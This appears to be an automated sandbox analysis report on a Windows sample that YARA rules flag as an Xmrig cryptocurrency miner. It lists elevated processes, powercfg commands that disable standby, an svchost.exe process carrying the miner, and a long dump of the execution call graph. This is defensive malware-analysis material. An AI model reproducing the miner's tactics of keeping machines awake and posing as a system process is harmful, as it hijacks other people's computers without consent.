                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                      Imagebase:0x7ff62edd0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:54
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:55
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                      Imagebase:0x7ff62edd0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:56
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:57
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:58
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:59
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:svchost.exe
                                      Imagebase:0x7ff7e52b0000
                                      File size:55'320 bytes
                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                      Has exited:false

                                      Disassembly

                                      Reset < >

                                        Executed Functions

                                        Function 00007FF683C21140 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2136602851.00007FF683C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF683C20000, based on PE: true
                                        • Associated: 00000000.00000002.2136545200.00007FF683C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2136680469.00007FF683C2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2136723867.00007FF683C31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2136751847.00007FF683C32000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137570781.00007FF684126000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137595951.00007FF68412A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff683c20000_lokigod.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42430f2344ef8e2c73b5046c9819b9514e03832da236caddbb8b9f06a9f0945f
                                        • Instruction ID: a47695c546d8642032c18a294e44e99f82216e486646eca9f85e5dcb0f1d17ab
                                        • Opcode Fuzzy Hash: 42430f2344ef8e2c73b5046c9819b9514e03832da236caddbb8b9f06a9f0945f
                                        • Instruction Fuzzy Hash: BFB01230D05349C4E3002F01D94735832707F1C740F542434C40C63362CEFE5041CB10

                                        Executed Functions

                                        Function 00007FF721EC1140 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2163566166.00007FF721EC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF721EC0000, based on PE: true
                                        • Associated: 00000022.00000002.2163537379.00007FF721EC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000022.00000002.2163600475.00007FF721ECD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000022.00000002.2163627936.00007FF721ED1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000022.00000002.2163869267.00007FF722150000.00000008.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000022.00000002.2164151876.00007FF7223C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000022.00000002.2164181148.00007FF7223CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_7ff721ec0000_vzppfnnlsyit.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42430f2344ef8e2c73b5046c9819b9514e03832da236caddbb8b9f06a9f0945f
                                        • Instruction ID: b73dfca4bb871a74ce373da8ad7e7952feda018f142462b2a8ae9dec4e99c19e
                                        • Opcode Fuzzy Hash: 42430f2344ef8e2c73b5046c9819b9514e03832da236caddbb8b9f06a9f0945f
                                        • Instruction Fuzzy Hash: CFB09260D0520988E3003B059C4225C62A0FB58782F800020C40C42352CAAE90418F60

                                        Execution Graph

                                        Execution Coverage:2.2%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:13.6%
                                        Total number of Nodes:897
                                        Total number of Limit Nodes:2
                                        execution_graph 2986 140001ac3 2989 140001a70 2986->2989 2987 14000199e 2991 140001a0f 2987->2991 2993 1400019e9 VirtualProtect 2987->2993 2988 140001b36 2990 140001ba0 4 API calls 2988->2990 2989->2987 2989->2988 2992 140001b53 2989->2992 2990->2992 2993->2987 2090 140001ae4 2091 140001a70 2090->2091 2092 14000199e 2091->2092 2093 140001b36 2091->2093 2096 140001b53 2091->2096 2095 140001a0f 2092->2095 2097 1400019e9 VirtualProtect 2092->2097 2098 140001ba0 2093->2098 2097->2092 2101 140001bc2 2098->2101 2099 140001c04 memcpy 2099->2096 2101->2099 2102 140001c45 VirtualQuery 2101->2102 2103 140001cf4 2101->2103 2102->2103 2107 140001c72 2102->2107 2104 140001d23 GetLastError 2103->2104 2105 140001d37 2104->2105 2106 140001ca4 VirtualProtect 2106->2099 2106->2104 2107->2099 2107->2106 2135 140001404 2208 140001394 2135->2208 2137 140001413 2138 140001394 2 API calls 2137->2138 2139 140001422 2138->2139 2140 140001394 2 API calls 2139->2140 2141 140001431 2140->2141 2142 140001394 2 API calls 2141->2142 2143 140001440 2142->2143 2144 140001394 2 API calls 2143->2144 2145 14000144f 2144->2145 2146 140001394 2 API calls 2145->2146 2147 14000145e 2146->2147 2148 140001394 2 API calls 2147->2148 2149 14000146d 2148->2149 2150 140001394 2 API calls 2149->2150 2151 14000147c 2150->2151 2152 140001394 2 API calls 2151->2152 2153 14000148b 2152->2153 2154 140001394 2 API calls 2153->2154 2155 14000149a 2154->2155 2156 140001394 2 API calls 2155->2156 2157 1400014a9 2156->2157 2158 140001394 2 API calls 2157->2158 2159 1400014b8 2158->2159 2160 140001394 2 API calls 2159->2160 2161 1400014c7 2160->2161 2162 140001394 2 API calls 2161->2162 2163 1400014d6 2162->2163 2164 1400014e5 2163->2164 2165 140001394 2 API calls 2163->2165 2166 140001394 2 API calls 2164->2166 2165->2164 2167 1400014ef 2166->2167 2168 1400014f4 2167->2168 2169 140001394 2 API calls 2167->2169 2170 140001394 2 API calls 2168->2170 2169->2168 2171 1400014fe 2170->2171 2172 140001503 2171->2172 2173 140001394 2 API calls 2171->2173 2174 140001394 2 API calls 2172->2174 2173->2172 2175 14000150d 2174->2175 2176 140001394 2 API calls 2175->2176 2177 140001512 2176->2177 2178 140001394 2 API calls 2177->2178 2179 140001521 2178->2179 2180 140001394 2 API calls 2179->2180 2181 140001530 2180->2181 2182 140001394 2 API calls 2181->2182 2183 14000153f 2182->2183 2184 140001394 2 API calls 2183->2184 2185 14000154e 2184->2185 2186 140001394 2 API calls 2185->2186 2187 14000155d 2186->2187 2188 140001394 2 API calls 2187->2188 2189 14000156c 2188->2189 2190 140001394 2 API calls 2189->2190 2191 14000157b 2190->2191 2192 140001394 2 API calls 2191->2192 2193 14000158a 2192->2193 2194 140001394 2 API calls 2193->2194 2195 140001599 2194->2195 2196 140001394 2 API calls 2195->2196 2197 1400015a8 2196->2197 2198 140001394 2 API calls 2197->2198 2199 1400015b7 2198->2199 2200 140001394 2 API calls 2199->2200 2201 1400015c6 2200->2201 2202 140001394 2 API calls 2201->2202 2203 1400015d5 2202->2203 2204 140001394 2 API calls 2203->2204 2205 1400015e4 2204->2205 2206 140001394 2 API calls 2205->2206 2207 1400015f3 2206->2207 2209 140006620 malloc 2208->2209 2210 1400013b8 2209->2210 2211 1400013c6 NtFilterToken 2210->2211 2211->2137 2212 140002104 2213 140002111 EnterCriticalSection 2212->2213 2217 140002218 2212->2217 2215 14000220b LeaveCriticalSection 2213->2215 2220 14000212e 2213->2220 2214 140002272 2215->2217 2216 140002241 DeleteCriticalSection 2216->2214 2217->2214 2217->2216 2219 140002230 free 2217->2219 2218 14000214d TlsGetValue GetLastError 2218->2220 2219->2216 2219->2219 2220->2215 2220->2218 2108 140001e65 2109 140001e67 signal 2108->2109 2110 140001e7c 2109->2110 2112 140001e99 2109->2112 2111 140001e82 signal 2110->2111 2110->2112 2111->2112 2994 140001f47 2995 140001e67 signal 2994->2995 2996 140001e99 2994->2996 2995->2996 2997 140001e7c 2995->2997 2997->2996 2998 140001e82 signal 2997->2998 2998->2996 2113 14000216f 2114 140002178 InitializeCriticalSection 2113->2114 2115 140002185 2113->2115 2114->2115 2116 140001a70 2119 14000199e 2116->2119 2120 140001a7d 2116->2120 2117 140001a0f 2118 1400019e9 VirtualProtect 2118->2119 2119->2117 2119->2118 2120->2116 2121 140001b53 2120->2121 2122 140001b36 2120->2122 2123 140001ba0 4 API calls 2122->2123 2123->2121 2221 140001e10 2222 140001e2f 2221->2222 2223 140001ecc 2222->2223 2227 140001eb5 2222->2227 2228 140001e55 2222->2228 2224 140001ed3 signal 2223->2224 2223->2227 2225 140001ee4 2224->2225 2224->2227 2226 140001eea signal 2225->2226 2225->2227 2226->2227 2228->2227 2229 140001f12 signal 2228->2229 2229->2227 2999 140002050 3000 14000205e EnterCriticalSection 2999->3000 3001 1400020cf 2999->3001 3002 1400020c2 LeaveCriticalSection 3000->3002 3003 140002079 3000->3003 3002->3001 3003->3002 3004 1400020bd free 3003->3004 3004->3002 3005 140001fd0 3006 140001fe4 3005->3006 3007 140002033 3005->3007 3006->3007 3008 140001ffd EnterCriticalSection LeaveCriticalSection 3006->3008 3008->3007 2238 140001ab3 2239 140001a70 2238->2239 2239->2238 2240 14000199e 2239->2240 2241 140001b36 2239->2241 2244 140001b53 2239->2244 2243 140001a0f 2240->2243 2245 1400019e9 VirtualProtect 2240->2245 2242 140001ba0 4 API calls 2241->2242 2242->2244 2245->2240 2080 140001394 2084 140006620 2080->2084 2082 1400013b8 2083 1400013c6 NtFilterToken 2082->2083 2085 14000663e 2084->2085 2088 14000666b 2084->2088 2085->2082 2086 140006713 2087 14000672f malloc 2086->2087 2089 140006750 2087->2089 2088->2085 2088->2086 2089->2085 2230 14000219e 2231 140002272 2230->2231 2232 1400021ab EnterCriticalSection 2230->2232 2233 140002265 LeaveCriticalSection 2232->2233 2235 1400021c8 2232->2235 2233->2231 2234 1400021e9 TlsGetValue GetLastError 2234->2235 2235->2233 2235->2234 2124 140001800 2125 140001812 2124->2125 2126 140001835 fprintf 2125->2126 2127 140001000 2128 14000108b __set_app_type 2127->2128 2129 140001040 2127->2129 2131 1400010b6 2128->2131 2129->2128 2130 1400010e5 2131->2130 2133 140001e00 2131->2133 2134 140006bc0 __setusermatherr 2133->2134 2236 140002320 strlen 2237 140002337 2236->2237 2246 140001140 2249 140001160 2246->2249 2248 140001156 2250 1400011b9 2249->2250 2251 14000118b 2249->2251 2252 1400011d3 2250->2252 2253 1400011c7 _amsg_exit 2250->2253 2251->2250 2254 1400011a0 Sleep 2251->2254 2255 140001201 _initterm 2252->2255 2256 14000121a 2252->2256 2253->2252 2254->2250 2254->2251 2255->2256 2272 140001880 2256->2272 2259 14000126a 2260 14000126f malloc 2259->2260 2261 14000128b 2260->2261 2263 1400012d0 2260->2263 2262 1400012a0 strlen malloc memcpy 2261->2262 2262->2262 2262->2263 2283 140003240 2263->2283 2265 140001315 2266 140001344 2265->2266 2267 140001324 2265->2267 2270 140001160 76 API calls 2266->2270 2268 140001338 2267->2268 2269 14000132d _cexit 2267->2269 2268->2248 2269->2268 2271 140001366 2270->2271 2271->2248 2273 140001247 SetUnhandledExceptionFilter 2272->2273 2274 1400018a2 2272->2274 2273->2259 2274->2273 2276 14000194d 2274->2276 2279 140001a20 2274->2279 2275 140001ba0 4 API calls 2275->2276 2276->2275 2278 14000199e 2276->2278 2277 1400019e9 VirtualProtect 2277->2278 2278->2273 2278->2277 2279->2278 2280 140001b36 2279->2280 2282 140001b53 2279->2282 2281 140001ba0 4 API calls 2280->2281 2281->2282 2286 140003256 2283->2286 2284 14000336c wcslen 2393 14000153f 2284->2393 2286->2284 2288 14000356e 2288->2265 2291 140003467 2294 14000348d memset 2291->2294 2296 1400034bf 2294->2296 2297 14000350f wcslen 2296->2297 2298 140003525 2297->2298 2302 14000356c 2297->2302 2299 140003540 _wcsnicmp 2298->2299 2300 140003556 wcslen 2299->2300 2299->2302 2300->2299 2300->2302 2301 140003631 wcscpy wcscat memset 2304 140003670 2301->2304 2302->2301 2303 1400036b3 wcscpy wcscat memset 2305 1400036f6 2303->2305 2304->2303 2306 1400037fe wcscpy wcscat memset 2305->2306 2307 140003840 2306->2307 2308 140003b8d wcslen 2307->2308 2309 140003b9b 2308->2309 2313 140003bcb 2308->2313 2310 140003ba0 _wcsnicmp 2309->2310 2311 140003bb6 wcslen 2310->2311 2310->2313 2311->2310 2311->2313 2312 140003cda wcscpy wcscat memset 2314 140003d1c 2312->2314 2313->2312 2315 140003d5f wcscpy wcscat memset 2314->2315 2317 140003da5 2315->2317 2316 140003dd5 wcscpy wcscat 2318 140006193 memcpy 2316->2318 2320 140003e07 2316->2320 2317->2316 2318->2320 2319 140003f5a wcslen 2322 140003f9f 2319->2322 2320->2319 2321 140004004 wcslen memset 2533 14000157b 2321->2533 2322->2321 2324 140004690 memset 2326 1400046bf 2324->2326 2325 140004704 wcscpy wcscat wcslen 2574 14000146d 2325->2574 2326->2325 2330 140004673 2331 14000145e 2 API calls 2330->2331 2333 14000466e 2331->2333 2332 14000157b 2 API calls 2367 14000412a 2332->2367 2333->2324 2336 140004814 2660 1400014a9 2336->2660 2337 1400048c7 2343 14000145e 2 API calls 2337->2343 2339 1400048ea memset 2341 140006274 2339->2341 2342 14000490e wcscpy wcscat wcslen 2339->2342 2379 140004a30 2342->2379 2354 1400048a4 2343->2354 2346 1400048b0 2351 14000145e 2 API calls 2346->2351 2347 14000145e 2 API calls 2347->2367 2349 14000449e _wcsnicmp 2353 140004656 2349->2353 2349->2367 2351->2354 2356 14000145e 2 API calls 2353->2356 2354->2339 2355 140004898 2358 14000145e 2 API calls 2355->2358 2357 140004662 2356->2357 2360 14000145e 2 API calls 2357->2360 2358->2354 2359 1400044fc _wcsnicmp 2359->2353 2359->2367 2360->2333 2361 140004c9c wcslen 2363 14000153f 2 API calls 2361->2363 2362 140004b31 wcslen 2364 14000153f 2 API calls 2362->2364 2363->2379 2364->2379 2365 140004550 _wcsnicmp 2365->2353 2365->2367 2366 140004323 wcsstr 2366->2353 2366->2367 2367->2324 2367->2330 2367->2332 2367->2347 2367->2349 2367->2359 2367->2365 2367->2366 2550 140001599 2367->2550 2563 1400015a8 2367->2563 2368 14000510d wcslen 2370 14000153f 2 API calls 2368->2370 2369 140004e95 wcslen 2371 14000157b 2 API calls 2369->2371 2370->2379 2371->2379 2372 140004f27 memset 2372->2379 2373 140005f5e memcpy 2373->2379 2374 140004f91 wcslen 2375 1400015a8 2 API calls 2374->2375 2375->2379 2377 140004ff9 _wcsnicmp 2377->2379 2378 140005d90 memcpy 2378->2379 2379->2361 2379->2362 2379->2368 2379->2369 2379->2372 2379->2373 2379->2374 2379->2377 2379->2378 2380 140005c0b wcslen 2379->2380 2382 1400057b5 memset 2379->2382 2383 1400059b0 memset 2379->2383 2384 140005a11 wcscpy wcscat wcslen 2379->2384 2385 1400027d0 11 API calls 2379->2385 2387 14000581b memset 2379->2387 2388 140005875 wcscpy wcscat wcslen 2379->2388 2391 14000145e NtFilterToken malloc 2379->2391 2392 140005b60 2379->2392 2776 1400014d6 2379->2776 2821 140001521 2379->2821 2919 140001431 2379->2919 2381 1400015a8 2 API calls 2380->2381 2381->2379 2382->2379 2382->2383 2383->2379 2386 140001422 2 API calls 2384->2386 2385->2379 2386->2379 2387->2379 2850 140001422 2388->2850 2391->2379 2392->2265 2394 140001394 2 API calls 2393->2394 2395 14000154e 2394->2395 2396 140001394 2 API calls 2395->2396 2397 14000155d 2396->2397 2398 140001394 2 API calls 2397->2398 2399 14000156c 2398->2399 2400 140001394 2 API calls 2399->2400 2401 14000157b 2400->2401 2402 140001394 2 API calls 2401->2402 2403 14000158a 2402->2403 2404 140001394 2 API calls 2403->2404 2405 140001599 2404->2405 2406 140001394 2 API calls 2405->2406 2407 1400015a8 2406->2407 2408 140001394 2 API calls 2407->2408 2409 1400015b7 2408->2409 2410 140001394 2 API calls 2409->2410 2411 1400015c6 2410->2411 2412 140001394 2 API calls 2411->2412 2413 1400015d5 2412->2413 2414 140001394 2 API calls 2413->2414 2415 1400015e4 2414->2415 2416 140001394 2 API calls 2415->2416 2417 1400015f3 2416->2417 2417->2288 2418 140001503 2417->2418 2419 140001394 2 API calls 2418->2419 2420 14000150d 2419->2420 2421 140001394 2 API calls 2420->2421 2422 140001512 2421->2422 2423 140001394 2 API calls 2422->2423 2424 140001521 2423->2424 2425 140001394 2 API calls 2424->2425 2426 140001530 2425->2426 2427 140001394 2 API calls 2426->2427 2428 14000153f 2427->2428 2429 140001394 2 API calls 2428->2429 2430 14000154e 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000155d 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000156c 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000157b 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000158a 2437->2438 2439 140001394 2 API calls 2438->2439 2440 140001599 2439->2440 2441 140001394 2 API calls 2440->2441 2442 1400015a8 2441->2442 2443 140001394 2 API calls 2442->2443 2444 1400015b7 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015c6 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015d5 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015e4 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015f3 2451->2452 2452->2291 2453 14000156c 2452->2453 2454 140001394 2 API calls 2453->2454 2455 14000157b 2454->2455 2456 140001394 2 API calls 2455->2456 2457 14000158a 2456->2457 2458 140001394 2 API calls 2457->2458 2459 140001599 2458->2459 2460 140001394 2 API calls 2459->2460 2461 1400015a8 2460->2461 2462 140001394 2 API calls 2461->2462 2463 1400015b7 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015c6 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015d5 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015e4 2468->2469 2470 140001394 2 API calls 2469->2470 2471 1400015f3 2470->2471 2471->2291 2472 14000145e 2471->2472 2473 140001394 2 API calls 2472->2473 2474 14000146d 2473->2474 2475 140001394 2 API calls 2474->2475 2476 14000147c 2475->2476 2477 140001394 2 API calls 2476->2477 2478 14000148b 2477->2478 2479 140001394 2 API calls 2478->2479 2480 14000149a 2479->2480 2481 140001394 2 API calls 2480->2481 2482 1400014a9 2481->2482 2483 140001394 2 API calls 2482->2483 2484 1400014b8 2483->2484 2485 140001394 2 API calls 2484->2485 2486 1400014c7 2485->2486 2487 140001394 2 API calls 2486->2487 2488 1400014d6 2487->2488 2489 1400014e5 2488->2489 2490 140001394 2 API calls 2488->2490 2491 140001394 2 API calls 2489->2491 2490->2489 2492 1400014ef 2491->2492 2493 1400014f4 2492->2493 2494 140001394 2 API calls 2492->2494 2495 140001394 2 API calls 2493->2495 2494->2493 2496 1400014fe 2495->2496 2497 140001503 2496->2497 2498 140001394 2 API calls 2496->2498 2499 140001394 2 API calls 2497->2499 2498->2497 2500 14000150d 2499->2500 2501 140001394 2 API calls 2500->2501 2502 140001512 2501->2502 2503 140001394 2 API calls 2502->2503 2504 140001521 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001530 2505->2506 2507 140001394 2 API calls 2506->2507 2508 14000153f 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000154e 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000155d 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000156c 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000157b 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000158a 2517->2518 2519 140001394 2 API calls 2518->2519 2520 140001599 2519->2520 2521 140001394 2 API calls 2520->2521 2522 1400015a8 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015b7 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015c6 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015d5 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015e4 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015f3 2531->2532 2532->2291 2534 140001394 2 API calls 2533->2534 2535 14000158a 2534->2535 2536 140001394 2 API calls 2535->2536 2537 140001599 2536->2537 2538 140001394 2 API calls 2537->2538 2539 1400015a8 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400015b7 2540->2541 2542 140001394 2 API calls 2541->2542 2543 1400015c6 2542->2543 2544 140001394 2 API calls 2543->2544 2545 1400015d5 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400015e4 2546->2547 2548 140001394 2 API calls 2547->2548 2549 1400015f3 2548->2549 2549->2367 2551 140001394 2 API calls 2550->2551 2552 1400015a8 2551->2552 2553 140001394 2 API calls 2552->2553 2554 1400015b7 2553->2554 2555 140001394 2 API calls 2554->2555 2556 1400015c6 2555->2556 2557 140001394 2 API calls 2556->2557 2558 1400015d5 2557->2558 2559 140001394 2 API calls 2558->2559 2560 1400015e4 2559->2560 2561 140001394 2 API calls 2560->2561 2562 1400015f3 2561->2562 2562->2367 2564 140001394 2 API calls 2563->2564 2565 1400015b7 2564->2565 2566 140001394 2 API calls 2565->2566 2567 1400015c6 2566->2567 2568 140001394 2 API calls 2567->2568 2569 1400015d5 2568->2569 2570 140001394 2 API calls 2569->2570 2571 1400015e4 2570->2571 2572 140001394 2 API calls 2571->2572 2573 1400015f3 2572->2573 2573->2367 2575 140001394 2 API calls 2574->2575 2576 14000147c 2575->2576 2577 140001394 2 API calls 2576->2577 2578 14000148b 2577->2578 2579 140001394 2 API calls 2578->2579 2580 14000149a 2579->2580 2581 140001394 2 API calls 2580->2581 2582 1400014a9 2581->2582 2583 140001394 2 API calls 2582->2583 2584 1400014b8 2583->2584 2585 140001394 2 API calls 2584->2585 2586 1400014c7 2585->2586 2587 140001394 2 API calls 2586->2587 2588 1400014d6 2587->2588 2589 1400014e5 2588->2589 2590 140001394 2 API calls 2588->2590 2591 140001394 2 API calls 2589->2591 2590->2589 2592 1400014ef 2591->2592 2593 1400014f4 2592->2593 2594 140001394 2 API calls 2592->2594 2595 140001394 2 API calls 2593->2595 2594->2593 2596 1400014fe 2595->2596 2597 140001503 2596->2597 2598 140001394 2 API calls 2596->2598 2599 140001394 2 API calls 2597->2599 2598->2597 2600 14000150d 2599->2600 2601 140001394 2 API calls 2600->2601 2602 140001512 2601->2602 2603 140001394 2 API calls 2602->2603 2604 140001521 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001530 2605->2606 2607 140001394 2 API calls 2606->2607 2608 14000153f 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000154e 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000155d 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000156c 2613->2614 2615 140001394 2 API calls 2614->2615 2616 14000157b 2615->2616 2617 140001394 2 API calls 2616->2617 2618 14000158a 2617->2618 2619 140001394 2 API calls 2618->2619 2620 140001599 2619->2620 2621 140001394 2 API calls 2620->2621 2622 1400015a8 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015b7 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015c6 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015d5 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015e4 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015f3 2631->2632 2632->2354 2633 140001530 2632->2633 2634 140001394 2 API calls 2633->2634 2635 14000153f 2634->2635 2636 140001394 2 API calls 2635->2636 2637 14000154e 2636->2637 2638 140001394 2 API calls 2637->2638 2639 14000155d 2638->2639 2640 140001394 2 API calls 2639->2640 2641 14000156c 2640->2641 2642 140001394 2 API calls 2641->2642 2643 14000157b 2642->2643 2644 140001394 2 API calls 2643->2644 2645 14000158a 2644->2645 2646 140001394 2 API calls 2645->2646 2647 140001599 2646->2647 2648 140001394 2 API calls 2647->2648 2649 1400015a8 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015b7 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015c6 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015d5 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015e4 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015f3 2658->2659 2659->2336 2659->2337 2661 140001394 2 API calls 2660->2661 2662 1400014b8 2661->2662 2663 140001394 2 API calls 2662->2663 2664 1400014c7 2663->2664 2665 140001394 2 API calls 2664->2665 2666 1400014d6 2665->2666 2667 1400014e5 2666->2667 2668 140001394 2 API calls 2666->2668 2669 140001394 2 API calls 2667->2669 2668->2667 2670 1400014ef 2669->2670 2671 1400014f4 2670->2671 2672 140001394 2 API calls 2670->2672 2673 140001394 2 API calls 2671->2673 2672->2671 2674 1400014fe 2673->2674 2675 140001503 2674->2675 2676 140001394 2 API calls 2674->2676 2677 140001394 2 API calls 2675->2677 2676->2675 2678 14000150d 2677->2678 2679 140001394 2 API calls 2678->2679 2680 140001512 2679->2680 2681 140001394 2 API calls 2680->2681 2682 140001521 2681->2682 2683 140001394 2 API calls 2682->2683 2684 140001530 2683->2684 2685 140001394 2 API calls 2684->2685 2686 14000153f 2685->2686 2687 140001394 2 API calls 2686->2687 2688 14000154e 2687->2688 2689 140001394 2 API calls 2688->2689 2690 14000155d 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000156c 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000157b 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000158a 2695->2696 2697 140001394 2 API calls 2696->2697 2698 140001599 2697->2698 2699 140001394 2 API calls 2698->2699 2700 1400015a8 2699->2700 2701 140001394 2 API calls 2700->2701 2702 1400015b7 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400015c6 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400015d5 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400015e4 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400015f3 2709->2710 2710->2346 2711 140001440 2710->2711 2712 140001394 2 API calls 2711->2712 2713 14000144f 2712->2713 2714 140001394 2 API calls 2713->2714 2715 14000145e 2714->2715 2716 140001394 2 API calls 2715->2716 2717 14000146d 2716->2717 2718 140001394 2 API calls 2717->2718 2719 14000147c 2718->2719 2720 140001394 2 API calls 2719->2720 2721 14000148b 2720->2721 2722 140001394 2 API calls 2721->2722 2723 14000149a 2722->2723 2724 140001394 2 API calls 2723->2724 2725 1400014a9 2724->2725 2726 140001394 2 API calls 2725->2726 2727 1400014b8 2726->2727 2728 140001394 2 API calls 2727->2728 2729 1400014c7 2728->2729 2730 140001394 2 API calls 